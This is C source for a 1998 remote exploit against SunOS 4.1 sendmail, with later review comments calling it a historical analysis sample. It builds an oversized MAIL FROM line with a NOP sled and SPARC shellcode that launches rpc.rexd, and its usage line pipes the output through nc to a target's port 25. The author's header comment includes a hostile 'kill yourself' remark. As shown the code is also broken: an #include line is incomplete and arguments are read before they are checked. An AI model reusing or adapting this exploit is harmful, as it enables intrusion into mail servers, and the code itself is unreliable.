/*
 * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
 * If you don't know what to do from there, kill yourself.
 * Remote stack pointer is guessed, the offset from it to the code is 188.
 *
 * Use: smrex buffersize padding |nc hostname 25
 *
 * where `padding` is a small integer, 1 works on my sparc 1+
 *
 * I use smrex 84 1, play with the numbers and see what happens. The core
 * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
 * see where your offsets went wrong :)
 *
 * I don't *think* this is the 8lgm syslog() overflow - see how many versions
 * of sendmail this has carried over into and let me know. Or don't, I
 * wouldn't :)
 *
 * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue
 * me, I'm new to this overflow business..in my day everyone ran YPSERV and
 * things were far simpler... :)
 *
 * The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
 */

/* NOTE(review): the header name on the #include line was lost in extraction,
 * so the directive is incomplete as shown. The calls below (printf, atoi,
 * exit, strcat) need <stdio.h>, <stdlib.h> and <string.h> to be declared. */
#include

/* NOTE(review): historical (1998) proof-of-concept kept as an analysis sample.
 * All the program does is write two SMTP lines to stdout: "helo" and a
 * "mail from:" whose argument is the padding string followed by the raw bytes
 * of large_string (printed with %s, so up to the first zero byte). On the wire
 * this is an abnormally long MAIL FROM: argument containing non-printable
 * bytes, which is the observable artifact a mail gateway or IDS can flag. */
int main(int argc, char **argv)
{
    long unsigned int large_string[10000]; /* word array, emitted as a byte string below */
    int i, prelude;
    unsigned long offset;                  /* assigned once below, never read */
    char padding[50];                      /* never initialized before strcat reads it */

    offset = 188; /* Magic numbers */

    /* NOTE(review): argv[1] is read before argc is checked, so running the
     * program with no arguments dereferences a NULL argv[1] here. */
    prelude = atoi(argv[1]);
    if (argc < 2) {
        printf("Usage: %s bufsize | nc target 25\n", argv[0]);
        exit(1);
    }

    /* NOTE(review): argv[2] is used although the usage check only covers
     * argv[1]; padding is appended to without initialization and without any
     * bound against its 50 bytes (reads uninitialized memory, may overrun). */
    for (i = 6; i < (6 + atoi(argv[2])); i++) {
        strcat(padding, "A");
    }

    /* NOTE(review): prelude comes straight from argv[1]; indices up to
     * prelude + 88 are written below with no check against the 10000-word
     * array, so a large or negative value writes out of bounds. */
    for(i = 0; i < prelude; i++) {
        large_string[i] = 0xfffffff0; /* Illegal instruction */
    }
    large_string[prelude] = 0xf7ffef50;     /* Arbitrary overwrite of %fp */
    large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */
    for( i = (prelude + 2); i < (prelude + 64); i++) {
        large_string[i] = 0xa61cc013; /* Lots of sparc NOP's */
    }

    /* Now the sparc execve /usr/etc/rpc.rexd code.. */
    /* (opaque SPARC instruction words as supplied by the author; not decoded here) */
    large_string[prelude + 64] = 0x250bcbc8;
    large_string[prelude + 65] = 0xa414af75;
    large_string[prelude + 66] = 0x271cdc88;
    large_string[prelude + 67] = 0xa614ef65;
    large_string[prelude + 68] = 0x291d18c8;
    large_string[prelude + 69] = 0xa8152f72;
    large_string[prelude + 70] = 0x2b1c18c8;
    large_string[prelude + 71] = 0xaa156e72;
    large_string[prelude + 72] = 0x2d195e19;
    large_string[prelude + 73] = 0x900b800e;
    large_string[prelude + 74] = 0x9203a014;
    large_string[prelude + 75] = 0x941ac00b;
    large_string[prelude + 76] = 0x9c03a104;
    large_string[prelude + 77] = 0xe43bbefc;
    large_string[prelude + 78] = 0xe83bbf04;
    large_string[prelude + 79] = 0xec23bf0c;
    large_string[prelude + 80] = 0xdc23bf10;
    large_string[prelude + 81] = 0xc023bf14;
    large_string[prelude + 82] = 0x8210203b;
    large_string[prelude + 83] = 0xaa103fff;
    large_string[prelude + 84] = 0x91d56001;
    large_string[prelude + 85] = 0xa61cc013;
    large_string[prelude + 86] = 0xa61cc013;
    large_string[prelude + 87] = 0xa61cc013;
    large_string[prelude + 88] = 0; /* zero word: the %s below stops here (assuming no earlier zero byte) */

    /* And finally, the overflow..simple, huh? :) */
    /* NOTE(review): passing an unsigned long array to %s is a format/argument
     * mismatch (undefined by the C standard); the program relies on printf
     * walking the array as a plain byte string. */
    printf("helo\n");
    printf("mail from: %s%s\n", padding, large_string);
}
/* www.hack.co.za [2000]*/